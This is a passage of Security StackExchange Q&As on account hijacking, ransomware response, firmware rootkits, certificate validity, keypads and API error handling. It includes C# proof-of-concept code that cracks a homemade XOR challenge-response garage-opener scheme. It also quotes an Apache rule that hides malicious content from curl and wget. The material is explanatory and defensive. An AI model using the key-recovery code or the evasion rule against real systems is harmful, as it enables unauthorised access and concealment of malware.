significant statistical edge to beat the other - real - players. This (collusion) is probably illegal in most poker games and thus real accounts are used to make detection hard. Also, that's probably not the attacker's real name, their mail address and/or PayPal account. It is probably the account of another victim of identity theft. In the light of the other answer, I assume that Facebook handles the legal things when you marked the activities as fraudulent. Update for modified question: As there seems to be no real money gains involved in this poker game instance, there is another valid reason to use your mom's account: Because it offers anonymity. If the stolen PayPal account owner tracks the usage down, it'll be your mom as a suspect, not the actual hacker. Using real, alien Facebook accounts offers another layer of protection with respect to law enforcement. There still remains the question of how the account was taken over. There are questions here that might answer that. If your mom does do password reuse , you might educate her about the implications and urge her to change all passwords and use different, strong ones for all accounts. This would be a good time to introduce her to the famous xkcd about diceware and/or a password manager, as David suggested in the comments. Also, as S.L. Barth suggests in the comments, using two-factor authentication wherever possible is a good call in any case. | {
"source": [
"https://security.stackexchange.com/questions/120443",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107475/"
]
} |
120,452 | Let's say I create a device which has an embedded Linux box in it (for example, a Raspberry Pi). After booting up, it starts the main application which is designed to provide the UI for the device. The simplest way to produce more of them, is just to set up everything on one specific device, set the users, privileges, configure the booting process, install my software, and then create an image of the SD card. Installing that image to other SD cards gets me identical clones of the original device, which I can now ship. However, this can lead to a serious vulnerability. As all the users will have exactly the same root password, all it takes is one user figuring it out (having access to the physical devices counts, as far as I know, for completely compromised security), and that one user might then use this knowledge to compromise the devices of other users (the device is expected to be used while connected to a network) How can one mitigate this risk? The software also needs to know the root password (as it needs to configure some hardware registers for the peripherals), so does this mean I have to compile the executable for each of the physical devices separately with separate root passwords, and create the users on each device separately, then manage to copy the correct software to the correct machine? This seems like a management nightmare. | I interpret your question as: What's the motivation for someone to use an alien Facebook account to play poker and stock it with chips? It's not that strange if you think about it this way: As poker is a game where knowledge about the dealt cards gives you a significant edge in the game, you'd like to use sock puppets at a table to know more about the card distribution. Thus, using sock puppets that are valid, active - real - Facebook accounts are the only way to gather more information without being spotted easily by heuristics. Düsseldorf is where one of the big data centers in Germany is located, so there is a good chance that session was held by a bot on a server, not a real person. Using two or three such bots on a table that are connected gives them a significant statistical edge to beat the other - real - players. This (collusion) is probably illegal in most poker games and thus real accounts are used to make detection hard. Also, that's probably not the attacker's real name, their mail address and/or PayPal account. It is probably the account of another victim of identity theft. In the light of the other answer, I assume that Facebook handles the legal things when you marked the activities as fraudulent. Update for modified question: As there seems to be no real money gains involved in this poker game instance, there is another valid reason to use your mom's account: Because it offers anonymity. If the stolen PayPal account owner tracks the usage down, it'll be your mom as a suspect, not the actual hacker. Using real, alien Facebook accounts offers another layer of protection with respect to law enforcement. There still remains the question of how the account was taken over. There are questions here that might answer that. If your mom does do password reuse , you might educate her about the implications and urge her to change all passwords and use different, strong ones for all accounts. This would be a good time to introduce her to the famous xkcd about diceware and/or a password manager, as David suggested in the comments. Also, as S.L. Barth suggests in the comments, using two-factor authentication wherever possible is a good call in any case. | {
"source": [
"https://security.stackexchange.com/questions/120452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12227/"
]
} |
120,469 | When a X.509 certificate chain is composed of
X1, X2 ... Xn and Xn is root CA,
Can a certificate in lower level have longer validity
period than its parents?
I think that lower level should be proper sub-range of high level
at least in practice. While I cannot find any such obligation in RFC2459,
can I rely on that assumption? Any comments are deeply appreciated. | This is an historically disputed point. In the validation algorithm from RFC 5280 (that supersedes RFC 2459, by the way), there is no requirement of validity range nesting. However, some historical implementations have insisted on it; see for instance the X.509 style guide of Peter Gutmann: Although this isn't specified in any standard, some software requires validity
period nesting, in which the subject validity period lies inside the issuer
validity period. Most software however performs simple pointwise checking in
which it checks whether a cert chain is valid at a certain point in time
(typically the current time). Maintaining the validity nesting requires that a
certain amount of care be used in designing overlapping validity periods
between successive generations of certificates in a hierarchy. Further
complications arise when an existing CA is re-rooted or re-parented (for
example a divisional CA is subordinated to a corporate CA). The Microsoft PKI ("ADCS", aka Active Directory Certificate Services ) enforces validity period nesting, in that, when it issues a certificate, it will not allow the end-of-validity date of that certificate to exceed that of the current CA certificate (in effect, truncating the validity period mandated by the template if it would lead to such a situation). Even though, when renewing a CA certificate, it is possible to keep the same CA name and CA key, in which case both the old and new CA certificates can be
used interchangeably as long as neither is expired, on EE certificates issued both before and after the renewal. That is, if the old CA certificate is CA1, the new one is CA2, certificate EE1 was issued before the renewal and certificate EE2 was issued after, then CA1->EE1, CA1->EE2, CA2->EE1 and CA2->EE2 should all validate; this is very convenient to ensure smooth transitions. While the validity period nesting implies that CA1->EE1 and CA2->EE2 will nest, CA1->EE2 and CA2->EE1 might not nest -- and this is fine. Summary: you cannot rely on validity period nesting, and you should not try to enforce nesting when validating certificates. | {
"source": [
"https://security.stackexchange.com/questions/120469",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95528/"
]
} |
120,472 | I've noticed that there is a third-party webservice we utilize programmatically at my job to transmit somewhat sensitive information and I was surprised to see that the endpoint was only using http, rather than https. Upon further investigation it appears that a whilelist is being employed by this webservice, meaning that theoretically only our server that actually utilizes this service should have access. I'm wondering whether the use of a whitelist is sufficient as a protection against sniffing/MitM attacks? Being a security conscious member of our team, I'm obviously in support of using https anywhere that potentially sensitive data is transmitted, but I'm not sure if that would be overkill or unnecessary when combined with a controlled whitelist. Obviously a malicious insider on the same network segment as our server may be able to observe this communication in the clear. But for the sake of argument I'd like to assume this situation is unlikely. | The sniffing problem is about "confidentiality", which whitelisting does not cover, as the traffic can be intercepted and read. The MitM problem is about "authenticity", which whitelisting does not cover either, as an intercepted packet can be modified without evidence of tampering.
I assume the whitelisting uses IP addresses, which can be arbitrarily forced into TCP/IP packets. | {
"source": [
"https://security.stackexchange.com/questions/120472",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/86178/"
]
} |
120,514 | My friend uses Firefox's built-in password manager feature to save passwords for sites. Later, after installing Avast Free Antivirus there was a feature called Passwords on the Avast UI. When accessed it read all the stored passwords from Firefox and gave this report. This clearly shows that passwords were read and compared by a third party tool (Avast). How does Firefox save the passwords? Is it a bug which is being exploited by Avast? | Passwords saved by Firefox are not encrypted (they are encrypted but the key can be read out) until you set a master password. I don't think that this is a bug, but every virus could read those passwords nonetheless | {
"source": [
"https://security.stackexchange.com/questions/120514",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99405/"
]
} |
120,603 | If an encrypted text is decrypted with its corresponding key, we would get the plaintext. However, what if I were to decrypt plain text? What would result? An error or some nonsensical number? | "Encryption" is a large term. In all generality, encryption takes an input message in some space of possible input messages; usually arbitrary "sequences of bits" with various restrictions on length, e.g. "length in bits must be a multiple of 8" (i.e. input must be a sequence of bytes), or "length must not exceed 245 bytes" (typical of asymmetric encryption with RSA in PKCS#1 v1.5 mode, with a 2048-bit RSA key). The output is al part of some space of possible output messages. Computers being computers, both input and output messages are ultimately encoded in sequences of bits, so it may happen that input and output message spaces overlap, in which case you can conceptually take an input message (a "plaintext"), interpret it as an output message, and try to decrypt it. This is not necessarily possible: for instance, with RSA asymmetric encryption (PKCS#1 v1.5) and a 2048-bit key, input messages (plaintexts) are arbitrary sequences of 0 to 245 bytes (inclusive) while output messages (ciphertexts) are sequences of exactly 256 bytes, so it is not possible, in such a case, to try to "decrypt a plaintext": possible plaintexts are not long enough to feed the decryption engine. When you can "decrypt a plaintext", what happens depends on the encryption system. Usually, when decryption works at all, what you get is essentially random-looking nonsense. In some cases, encryption is an involution (e.g. stream ciphers such as RC4 that work by XORing the message with a key-dependent stream), meaning that decryption and encryption are actually the same operation, so by "decrypting" the plaintext you are actually encrypting it. However, it may also happen that not all sequences of bits of the right length are valid ciphertexts. For instance, consider a block cipher in CBC mode . To encrypt a message m , you must: Pad the message to a length multiple of the block size, by appending between 1 and n bytes ( n is the block size) with some specific contents. Generate a new random IV of the same size as the block size. Apply CBC encryption on the padded message, using that IV. Output is the concatenation of the IV and the encryption result. In such a case, when decrypting, not only must the length be a non-zero multiple of the block size, but after decryption, a valid padding must be found. If using the usual "PKCS#7 padding" (when adding k bytes, all added bytes have value exactly k ), the probability that a plaintext of a compatible length actually decrypts to something with a valid padding is about 1/255. In that case, "decrypting the plaintext" will produce a decryption error 99.61% of the time, and some random-looking junk the remaining 0.39%. Good encryption system include a MAC , in which case attempting to decrypt something which was not the result of encryption with the same key should result in a duly reported decryption error with overwhelming probability. Summary: when you try to do something that does not make sense, you can obtain various results. | {
"source": [
"https://security.stackexchange.com/questions/120603",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107647/"
]
} |
120,616 | The answer to this is probably simple, but it eludes me. Here's the scenario: At the moment, I have a server with a certificate issued to it using HTTPS that a customer POSTs responses to after processing requests sent from a web service. The customer's server has their own certificate issued to it and it also uses HTTPS. Neither certificate is a wildcard cert. As part of the original setup, the customer requested that my server had a certificate (unsurprisingly). Now, the customer has an additional requirement as part of a recent upgrade. They want my root cert installed on their server. As I mentioned above, my server already has a valid, non-wildcard certificate. When their server POSTs to mine, they already see that valid cert, and when my server talks to their server I see their cert. So what would my customer gain from this? Edit: To clarify, my certificate is signed by a third party CA. | "Encryption" is a large term. In all generality, encryption takes an input message in some space of possible input messages; usually arbitrary "sequences of bits" with various restrictions on length, e.g. "length in bits must be a multiple of 8" (i.e. input must be a sequence of bytes), or "length must not exceed 245 bytes" (typical of asymmetric encryption with RSA in PKCS#1 v1.5 mode, with a 2048-bit RSA key). The output is al part of some space of possible output messages. Computers being computers, both input and output messages are ultimately encoded in sequences of bits, so it may happen that input and output message spaces overlap, in which case you can conceptually take an input message (a "plaintext"), interpret it as an output message, and try to decrypt it. This is not necessarily possible: for instance, with RSA asymmetric encryption (PKCS#1 v1.5) and a 2048-bit key, input messages (plaintexts) are arbitrary sequences of 0 to 245 bytes (inclusive) while output messages (ciphertexts) are sequences of exactly 256 bytes, so it is not possible, in such a case, to try to "decrypt a plaintext": possible plaintexts are not long enough to feed the decryption engine. When you can "decrypt a plaintext", what happens depends on the encryption system. Usually, when decryption works at all, what you get is essentially random-looking nonsense. In some cases, encryption is an involution (e.g. stream ciphers such as RC4 that work by XORing the message with a key-dependent stream), meaning that decryption and encryption are actually the same operation, so by "decrypting" the plaintext you are actually encrypting it. However, it may also happen that not all sequences of bits of the right length are valid ciphertexts. For instance, consider a block cipher in CBC mode . To encrypt a message m , you must: Pad the message to a length multiple of the block size, by appending between 1 and n bytes ( n is the block size) with some specific contents. Generate a new random IV of the same size as the block size. Apply CBC encryption on the padded message, using that IV. Output is the concatenation of the IV and the encryption result. In such a case, when decrypting, not only must the length be a non-zero multiple of the block size, but after decryption, a valid padding must be found. If using the usual "PKCS#7 padding" (when adding k bytes, all added bytes have value exactly k ), the probability that a plaintext of a compatible length actually decrypts to something with a valid padding is about 1/255. In that case, "decrypting the plaintext" will produce a decryption error 99.61% of the time, and some random-looking junk the remaining 0.39%. Good encryption system include a MAC , in which case attempting to decrypt something which was not the result of encryption with the same key should result in a duly reported decryption error with overwhelming probability. Summary: when you try to do something that does not make sense, you can obtain various results. | {
"source": [
"https://security.stackexchange.com/questions/120616",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107655/"
]
} |
120,701 | This might sound like a funny question from a twelve-year-old. The less funny part is that I am 21 and currently studying at university (I don't live at University, although I am 15 minutes away. I do not use university network). You might or mightn't believe me, but I have more than enough information to know surefire that both Mom and the university are spying on me from a distance. I know this sounds really paranoid, but let's not discuss it and instead assume that what I say is true. I am wondering in what ways it could be possible, and how I could counter it. Some information about my situation: Mom pays for the internet. Mom lives about 500 miles away. Mom comes every week-end, but cannot physically access my computer (I am always at home, I would know if she did) Mom is incredibly computer-illiterate, but I believe she gets help from people at my uni, as I am sure some of them know more than they should about me. My first thoughts were: My ISP: she might be calling my (her ...) ISP for internet history. I don't know if it is common practice, but it is theoretically plausible. After all, they can monitor my internet traffic, and since mom pays for the internet, she has legal rights to access history. I don't really know if there is a way to counter it. Would using Tor work against it? Wi-Fi and neighbors: she might have gotten the Wi-Fi key and sent it to neighbors, relaying information to her. However, I rarely, if ever, use Wi-Fi. I am directly connected by cable. It is on though, so I don't know if they can still access my computer. If that's the case, can I just disable Wi-Fi and just use cable internet? Is there another way to counter it? (Unlikely, but still): a trojan has been installed on my computer. However, Kaspersky doesn't tell me that anything is wrong. So I can't do anything about it if I don't find it. That probably won't happen because it most likely doesn't exist, and if it does, it is definitely well-hidden. Would Tor solve this problem? Is it all I need? I'd really like to find an alternative solution, since using it for a long time would make me become suspicious even to the eyes of people other than mom. @Matthew Peters: By spying, I mean virtually everything I look up. I don't download much. For example, she might know what youtube videos I watch, or what Wikipedia article I read, basically anything, whether HTTPS or not. | Be careful about assuming too much. You say that you know "surefire" that your university is spying on you, but your only evidence is that your mom is computer illiterate and you're "sure some of them know more than they should" about you ( WARNING - this is a red flag for those of us not in your situation, you do indeed sound extremely paranoid ). If you don't use the university network (which seems unusual when you're on campus with your computer, but I'll take it as given), then your university has no interest in your browsing history, full stop. If someone there in some way helped her get access to your activity, they could go to jail . You wonder if your mom has conscripted your neighbors into her spying scheme (another red flag). Unless your neighbors are the absolute pinnacle of unscrupulous busybodies, they have no interest in your browsing history - they could also go to jail . Very few people could legally help your mother to spy on you, and no one is interested in breaking the law to spy on you . The ISP could theoretically provide her some of your browsing history: If they offer some sort of network monitoring service for child safety, then they would provide her whatever they offered to provide her, but it's highly unlikely that such a service actually keeps records, and more likely that it is meant to just block content - if you're not being blocked, such a system wouldn't care what you're doing. If you fall afoul of the DMCA by downloading copyrighted content and the copyright holder both discovers you and sends a notice to your ISP, that notice would be forwarded to your mother as the ISP account holder. ... ISPs are big, they have a lot of customers, and storing browsing history takes up a lot of space they for information they don't want to be legally liable for (e.g. if they record browsing history, they can be subpoena'd for it), so it's unlikely that they could provide this information to your mother. That's assumption 1. You then say that she knows what you browse whether you access it over HTTPS or not. This categorically rules out any sort of "from a distance" spying - once your request leaves your browser, no one knows what that request is until it reaches the server it's going to. What this means practically is that if you use HTTPS URLs, someone (theoretically) could know that you went to YouTube, but they couldn't know what you watched. They could know you went to Wikipedia, but not which articles you read. If someone is capable of breaking HTTPS encryption, that person has far more lucrative opportunities than helping mothers spy on their sons. Even if you're mistaken and only HTTP URLs are affected, it still requires someone to basically perform an illegal wiretap to access that information because, as we've determined above, no one who has direct access to your browsing history is interested in keeping it or showing it to anyone. Which leaves us with what is by far the most likely scenario:
There are oodles and oodles of spyware programs out there that have varying degrees of legitimacy - as others have said, many are marketed as tools to give parents just this level of access. Your mother could have found such a tool by typing full sentences into Google easily enough, and they're probably one-click installers just for people like her. Have you confirmed that there is no hardware device like a keylogger installed on your machine? All of these methods get at your history the moment it's created, before it has a chance to be encrypted or go over the wire. They are also the most legally defensible ways for someone to view your browsing history. A big honorable mention goes to the person in the other answer or comment that suggested that if you have a browser profile logged in on a computer that your mother has at her house, then she can view your ongoing internet history as if it were her own. Simplest fix would be to browse in in-cognito mode (or equivalent for your browser if not Chrome), it won't record your history. As for what to do about all of this, I'm going to go the tough love route: Talk to your mother. Tell her to back off, or if she won't tell her she's welcome to view your history but it won't change what you look at. You're a big boy, act like it. Pay for your own ISP. As I've stated I don't believe this avenue is being exploited to see your information, but if she's paying for your service and using that as a justification to spy on you, then it's time to take the next step to separate yourself from reliance on her. Reformat your computer. If there's any concern that something is installed that you can't find, just backup your important documents, erase the thing and start over. Don't put a bandaid on a bullet hole by using ways to hide your traffic from spyware. This one I'm just throwing out there to see if it sticks, if it doesn't describe your scenario then sorry, I'm mostly keying in on the above mentioned red flags: if you're off your meds, get back on them. | {
"source": [
"https://security.stackexchange.com/questions/120701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107795/"
]
} |
120,711 | So, whenever you hear of the mean little hackers who hack websites you hear of "port scanning". I understand what it is (looking for all open ports / services on a remote machine), however that begs the question: Why would an attacker want to know what ports are open? The only reason I see for this is looking for services that may or may not have the default username and password OR a vulnerability or something. But seeing as the odds for this are quite low, why do hackers perform port scans? Is it purely for the reason above? | To run an exploit, an attacker needs a vulnerability. To find a vulnerability, the attacker needs to fingerprint all services which run on the machine (find out which protocol they use, which programs implement them and preferably the versions of those programs). To fingerprint a service, the attacker needs to know that there is one running on a publicly accessible port. To find out which publicly accessible ports run services, the attacker needs to run a port scan. As you see, a port scan is the first reconnaissance step an attacker performs before attacking a system. | {
"source": [
"https://security.stackexchange.com/questions/120711",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92860/"
]
} |
120,748 | You boot up your computer one day and while using it you notice that your drive is unusually busy. You check the System Monitor and notice that an unknown process is using the CPU and both reading and writing a lot to the drive. You immediately do a web search for the process name, and find that it's the name of a ransomware program. A news story also comes up, telling you about how a popular software distribution site was recently compromised and used to distribute this same ransomware. You recently installed a program from that site. Clearly, the ransomware is in the process of doing its dirty work. You have large amounts of important data on the internal drive, and no backup. There is also a substantial amount of non-important data on the drive. This question's title says "mid" operation, but in this example we have not yet investigated how far the ransomware might have actually gotten in its "work." We can look at two situations: You want to preserve as much of your data as possible. However, paying any ransom is out of the question. If possible without risk, you want to know whether the important parts of your data are actually encrypted and overwritten. You also want to try and extract as much of your data as possible without making things worse. You would hate to pay a ransom. But certain parts of the data are so important to you that you would, ultimately, as a last resort, like to still be able to pay for a chance to get them back rather than risk losing any of them. Step by step, what is the ideal thing to do in situation 1 and 2? And why? Note: This is hypothetical. It hasn't actually happened to me. I always keep offsite backups of my important data and I've never been affected by ransomware. | Hibernate the computer If the ransomware is encrypting the files, the key it is using for encryption is somewhere in memory. It would be preferable to get a memory dump, but you are unlikely to have the appropriate hardware for that readily available. Dumping just the right process should also work, but finding out which one may not be trivial (eg. the malicious code may be running inside explorer.exe ), and we need to dump it now . Hibernating the computer is a cheap way to get a memory image¹ Then it could be mounted read-only on a clean computer for a) Assessment of the damage inflicted by the ransomware b) Recovery of unencrypted files² c) Forensic extraction of the in-memory key from the malicious process, other advanced recovery of the files, etc. Note that by read-only I mean that no write is performed at all, for maximum recovery chances. Connecting normally to another Windows system won't provide that. For (c) you would probably need professional support. It may be provided free of charge by your antivirus vendor. Even if you don't manage to recover all your files or you are told it is impossible or too expensive, keep the disk with the encrypted files. What it's impossible today may be cheaper or even trivial in a few months. I recommend that you simply perform the new install on a different disk (you were going to reinstall anyway, the computer was infected, remember?), and keep the infected one -properly labelled- in a drawer. -- As for the second question, where you really want to pay the ransom I'm quite sure the ransomware author could give you back your files even if not all of them were encrypted. But if really needed, you could boot from the hibernated disk after cloning it , and let it finish encrypting your (now backed-up) files… ¹ NB: if you didn't have an hibernation file, this may overwrite plaintext versions of now-encrypted files that could have been recovered (not relevant for most recent ransomware, though). ² Assuming they are not infected… | {
"source": [
"https://security.stackexchange.com/questions/120748",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105562/"
]
} |
120,808 | I have been reading a lot here about Ransomware attacks and I am wondering if my strategy for protecting myself is valid or not. I have 10Gb of personal data and 90Gb of photos and videos. I have them in D:\ drive in two separate folders. Personal data folder is synced with Google Drive. Photos are synced with a similar tool (Hubic).
This way every new photo I copy to D:\ drive is soon sent to Cloud Storage. If my hard drive dies or is stolen I still have my online copy. But in case I suffer a Ransomware attack, I am thinking it might not be good as possibly the data would be deleted/encrypted also in Google Drive.
So my question is: Is my method of syncing my data to online storage services (Google Drive, Dropbox, etc.) a good way to protect myself against Ransomware? Is there a better backup strategy for ensuring I can recover from Ransomware? Note : There is a similar question here but it focuses on if the online storage vendor can be trusted or not. In my case I choose to trust them, so, given a successful Ransomware attack, would I have a backup to ignore Ransomware demands. | I'm not sure about Google Drive, but Dropbox provides a way to recover previous file versions, a feature that wouldn't be impacted by the ransomware, since it relies on a file copies on the Dropbox servers. So it'd certainly be a way of protecting your data. However, recovering everything over your internet connection is a relatively slow process. Personally, I would use a NAS device, but wouldn't map it as a network drive (because those can - and will be influenced if a ransomware is activated on your computer). I would use it via FTP / SFTP, probably with a script that syncs the files on a regular basis. This way you have the files locally, which makes restoring from an attack less of a problem. It is probably cheaper too. Also, if you prefer Dropbox-like experience, you might want to try ownCloud on your own device - it also keeps the previous versions of file, allowing you to roll back in case of file damage or corruption. Keep in mind that storing multiple old versions of a file takes space on your NAS's disk(s). | {
"source": [
"https://security.stackexchange.com/questions/120808",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107952/"
]
} |
120,861 | I recently visited a website which used to have an HTTPS connection. Now it has just a plain HTTP connection, and the authentication method has changed from user+password to "authenticate with Google account". I contacted them and asked them why they dropped the HTTPS, and they told me "because now the authentication is secure with Google, so it is not necessary anymore". Well, I am not an expert in security, but before replying to them, I would like to know: what could go wrong? So, with my little knowledge, I would say (correct me if I am wrong): Privacy loss in the communications between client and server (the attacker can read any information exchanged, and that includes personal information that the client may be posting to the server). An attacker could modify the client's requests, maybe with malicious intentions. An attacker could read the cookie and use it to get access to the service as if they were the client that originally authenticated using Google's services. Am I right? What else could go wrong? | You are right, the regression to HTTP is pointless. Note that all your points apply to one particular kind of attack, where the adversary is able to access the data transport between client and server. That could be the owner of a WiFi hotspot or your ISP acting as a man-in-the-middle , who sits in between you and the server. This can be hard to accomplish for a remote attacker, but is particularly easy on a public WiFi. What HTTPS adds to HTTP is secure data transport . The web application itself can be completely fine - if you are communicating over an unencrypted channel, the attacker will be able to read, modify and inject arbitrary data into your requests and the server responses. With a captured session cookie, it will also be possible to impersonate you for as long as the cookie is valid. What the attacker cannot do is take over your Google account or reauthenticate with Google at a later point. This is because the authentication with Google always happens over SSL and the granted token expires after a given time. So the situation is somewhat better than capturing your credentials straight away. However, as you said, an attacker would still be able to take over the session and perform any action on your behalf. | {
"source": [
"https://security.stackexchange.com/questions/120861",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55814/"
]
} |
121,100 | Are there viruses that have managed to hide themselves somewhere other than on the hard drive? Like CPU cache or on the motherboard? Is it even possible? Say I get a virus, so I get rid of the HDD and install a new one. Could the virus still be on my PC? | Plenty of places: BIOS / UEFI - BlackHat presentation (PDF) System Management Mode (SMM) or the Intel Management Engine (IME) - Phrack article . GPUs - Proof of concept rootkit on GitHub . Network cards - Recon 2011 presentation (PDF) A Quest To The Core (PDF) - a good presentation covering everything from BIOS to SMM to microcode. Modern hardware has a wide range of persistent data stores, usually used for firmware. It's far too expensive to ship a complex device like a GPU or network card and put the firmware on a mask ROM where it can't be updated, then have a fault cause mass recalls. As such you need two things: a writeable location for that firmware, and a way to put the new firmware in place. This means the operating system software must be able to write to where the firmware is stored in the hardware (usually EEPROMs). A good example of this is the state of modern BIOS/UEFI update utilities. You can take a UEFI image and an executable running on your OS (e.g. Windows), click a button, and your UEFI updates. Simple! If you reverse engineer how these work (which I have done a few times) it's mostly a case of a kernel-mode driver being loaded which takes page data from the given UEFI image and talks directly to the UEFI chip using the out instruction, sending the correct commands to unlock the flash and start the update process. There are some protections, of course. Most BIOS / UEFI images won't load unless they're signed by the vendor. Of course, an advanced enough attacker might just steal the signing key from the vendor, but that's going into conspiracy theories and godlike threat actors, which just aren't realistic to fight in almost any scenario. Management engines like IME are meant to have certain protections which prevent their memory sections from being accessed even by ring0 code, but research has shown that there are many mistakes out there, and lots of weaknesses. So, everything is screwed, right? Well, yes and no. It's possible to put rootkits in hardware, but it's also incredibly difficult. Each individual computer has such a variance in hardware and firmware versions that it's impossible to build a generic rootkit for most things. You can't just get a generic Asus BIOS and flash it to any board; you'll kill it. You'd need to create a rootkit for each separate board type, sometimes down to the correct revision range. It's also an area of security that involves a huge amount of cross-domain knowledge, way down deep to the hardware and low-level operational aspects of modern computing platforms, alongside strong security and cryptographic knowledge, so not many people are capable. Are you likely to be targeted? No. Are you likely to get infected with a BIOS/UEFI/SMM/GPU/NIC-resident rootkit? No. The complexities and variances involved are just too great for the average user to ever realistically have to worry about it. Even from an economic perspective, these things take an inordinate amount of skill and effort and money to build, so burning them on consumer malware is idiotic. These kinds of threats are so targeted that they only ever really belong in the nation-state threat model. | {
"source": [
"https://security.stackexchange.com/questions/121100",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108303/"
]
} |
121,112 | Every time I visit a clinic, office or train station I notice how easy it is to figure out the PIN required to unlock the staff-only door by just watching an employee entering the restricted area. I usually don't have to do anything, not even trying not to get caught, simply it's pretty easy to know the PIN from a decent distance because the keypad design in typical and everybody knows the location of the digits and which one corresponds to which square. However I went to the bank and the keypad there had a different design which made it difficult to guess the PIN. What is the down side of this design? why don't we see it used in safes? | There is a Security User Experience (SUX) downside, which you might consider to be minor. As someone who is more kinestheticly inclined, I don't memorize things like phone numbers or PINs: I memorize patterns. If I was forced to use this keypad, I would have to use a compensating method to remember the actual digits (like writing it down). While not everyone is strongly kinesthetic, it is a factor in how people learn, which means that others might need to write down the passcode, too. This, of course, defeats the purpose of having a dynamic keypad. As I say, it might be a minor point, but it is a downside that impacts security. | {
"source": [
"https://security.stackexchange.com/questions/121112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
121,116 | I'm building an Arduino based radio garage door opener, and in order to protect it from replay attacks I've came up with this algorithm: sender initiates communication receiver sends a random 32 bit number XORed with a secret key sender reverses the XOR operation using the same secret key, resolves the challenge (ex: challenge ^ 2 - 5), XORes and sends the result to the receiver together with the command (gate up or gate down) receiver compares the response with it's own calculation of the challenge and executes the command if they match. I'm curious, do the steps described above ensure that the response is impossible to guess for an attacker? | No. Let's write it up: C is the challenge message R is the response message K is the secret key C = q ⊕ K where q is a random number. R = ((C ⊕ K) 2 - 5) ⊕ K , or if we skip the decryption step: R = (q 2 - 5) ⊕ K . The attacker can see both C and R . If the attacker then xors the two values: C ⊕ R = (q 2 - 5) ⊕ K ⊕ q ⊕ K Since we're xoring with K twice, we can just drop those operations out. This gives the attacker the following: C ⊕ R = (q 2 - 5) ⊕ q There are only a few values for q for any given value of C ⊕ R in the 32-bit space. In fact, it's an easy enough operation to just brute force: just try all q values until you find all the values that match. This gives you some possible value of q , the random number. Since C = q ⊕ K , just compute C ⊕ q for each candidate q to get a small number of possible K values. Repeat this process for a second time and see which candidate K value came up in both runs: this gives you K . I even wrote a PoC! // our key!
int k = 0xBAD1DEA;
void Main()
{
// output the key just so we can see it in the output
Console.WriteLine("Key is: 0x{0:X8}", k);
int challenge = GenerateChallenge();
int response = GenerateResponse(challenge);
Console.WriteLine();
Console.WriteLine("Cracking the challenge and response...");
// this is the attacker: they know only the challenge and respoonse!
Crack(challenge, response);
}
int GenerateChallenge()
{
Random rng = new Random();
// I'm keeping the random number small-ish to avoid the c^2 operation from overflowing
// this is just a limitation of the fact that .NET has sane integer types that don't wrap on multiplication overflows
int q = rng.Next(0, 10000000);
Console.WriteLine("I picked q={0}", q);
int challenge = k ^ q;
return challenge;
}
int GenerateResponse(int c)
{
c ^= k;
return ((c * c) - 5) ^ k;
}
void Crack(int c, int r)
{
int c_r = c ^ r;
// try all possible 'q' values.
for (int q = 1; q < int.MaxValue; q++)
{
if ((((q * q) - 5) ^ q) == c_r)
{
// got a match, output it
Console.WriteLine("q candidate: {0}", q);
Console.WriteLine("k candidate: 0x{0:X8}", q ^ c);
}
}
} Sample output: Key is: 0x0BAD1DEA
I picked q=2847555
Cracking the challenge and response...
q candidate: 2847555
k candidate: 0x0BAD1DEA The "cracking" process took less than a second on my system. EDIT: Since this apparently wasn't clear: you're not bruteforcing anything against the real system. This approach doesn't involve you sending any data to the receiver at all. You simply sit there with a software defined radio (SDR) and capture the signals produced when the owner opens their garage door. You then extract the challenge and response values from those signals - these are C and R . Given C and R you can use the above process to compute a few possible q values for that particular challenge/response pair. In some cases you'll get only one, in some cases you might get 2 or 3. Compute q ⊕ C for each candidate q to get a list of candidate K values. If you get more than one, wait for them to open their garage again and capture another C and R pair, re-run the process, and see which candidate K values match the first time around - this will give you the real K value. Once you've got that, you've got everything you need to impersonate the real opener device. You can reply correctly every time since you know the value of K . | {
"source": [
"https://security.stackexchange.com/questions/121116",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108317/"
]
} |
121,481 | It is a known fact that exposing the exception information to the end user provides security risks since an adversary can user that to figure out how things work internally and attack it. But what about a web service, where that information might be relevant to the developers that consume the API? On one hand exposing full stacktrace and even the message is risky since it might contain some database information e.g. on the other hand if something goes wrong and the server just says 500 "sorry", then developers would be frustrated. I guess really the proper way is to handle all exceptions you know of in a secure manner, i.e. catch business/validation exceptions and return it back with special error codes and messages (no stacktrace) and for all unknown still make 500 "sorry". But I would like to here what are the common ways of doing it and which approach should be taken from security point of view. | The API should not expose any internal information, i.e stack traces or similar. As you really noticed they might leak information which might be used to attack the implementation. Moreover they are usually only relevant for the developer of the API and not the user of the API. These users expect proper error messages anyway and not some strange message where they would need to ask the API developer first what this means and the developer would need to look at the source code. So this might be less a security issue but more a usability problem of the API if you just throw the stack trace to the user instead of something meaningful for the user. | {
"source": [
"https://security.stackexchange.com/questions/121481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36623/"
]
} |
121,610 | Sometimes I'm interested in what's behind a malicious website. How do I stay on the safe side if I decide to inspect? I'm searching for methods that are quicker and more simple than running the website on a virtual machine. Should I use cURL and view the HTML source in a file viewer? Should I simply view the source in the browser using view-source:http://malicious-website/ ? Are those safe? | Why not just send the URL to Virustotal? Accessing a malicious website can be tricky. Using curl, wget, links -dump can be tricky depending on how the malicious content is served up. For example: <IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT}
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww\-perl|curl|wget).* [NC]
RewriteRule ^(.*)$ - [F,L]
